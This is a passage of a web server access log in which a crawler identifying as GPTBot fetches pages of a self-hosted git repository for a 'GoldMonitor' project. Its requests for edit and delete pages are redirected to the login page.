+0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 21115] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18804] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19607] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:15:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 6798] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" -[17/Feb/2026:17:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:15:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22525] [Gzip 10.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19346] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20700] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.html" [Client 74.7.227.38] [Length 4480] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:17:15:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" -[17/Feb/2026:17:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56425] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" -[17/Feb/2026:17:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481683] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:17:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176815] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" -[17/Feb/2026:17:15:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr 